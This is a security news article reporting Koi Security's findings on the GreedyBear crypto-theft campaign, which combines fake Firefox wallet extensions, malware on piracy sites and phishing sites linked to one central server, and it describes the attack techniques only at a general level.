GreedyBear: 40 Fake Crypto Wallet Extensions Found on Firefox Marketplace

A sophisticated and large-scale cybercrime campaign, named GreedyBear, has been exposed for stealing at least a million dollars from cryptocurrency users. The research, carried out by cybersecurity firm Koi Security and shared with Hackread.com, reveals a highly organised operation that goes far beyond typical online scams.

Instead of focusing on a single type of attack, the criminals behind GreedyBear are using a coordinated mix of malicious browser extensions, malicious software, and fake websites. This strategy allows them to attack from multiple angles at the same time, making their operation incredibly effective.

One of the main ways GreedyBear operates is through malicious browser extensions. The group has created over 150 fake extensions for the Firefox marketplace, pretending to be popular crypto wallets like MetaMask, TronLink, Exodus, and Rabby Wallet.

Exodus Wallet risk report from Koidex risk engine (Source: Koi Security)

The attackers use a clever trick called “Extension Hollowing” to evade security checks. They first upload harmless extensions and, after building credibility with fake positive reviews, they hollow out the extensions by changing their names and icons and injecting malicious code, all while keeping the positive review history.

The second method involves almost 500 malicious programs, or executables, found on sites offering pirated software. These harmful programs include credential stealers, which are designed to steal your login information, and ransomware, which locks your files and demands a payment. The variety of these tools shows the group is not just a one-trick pony but has a wide range of methods to target victims.

Thirdly, the group has set up dozens of fake websites that look like legitimate crypto services or wallet repair tools. These sites are designed to trick users into entering personal information and wallet details.

A key detail Koi Security’s research has revealed is that all of these attacks, the fake extensions, the malware, and the scam websites, are all connected to a single central server (185.208.156.66). This central hub allows the attackers to manage their large-scale operation with great efficiency.

Researchers note that this campaign, which started as a smaller effort known as Foxy Wallet, has now grown into a major multi-platform threat, with signs that it could soon expand to other browsers like Chrome and Edge.

Connection graph for 185.208.156.66 (Source: Koi Security)

Researchers also noted that this type of large-scale, automated crime is likely made possible by new AI tools, making it faster and easier than ever for criminals to launch attacks. This new reality means that relying on old security methods is no longer enough to stay safe online.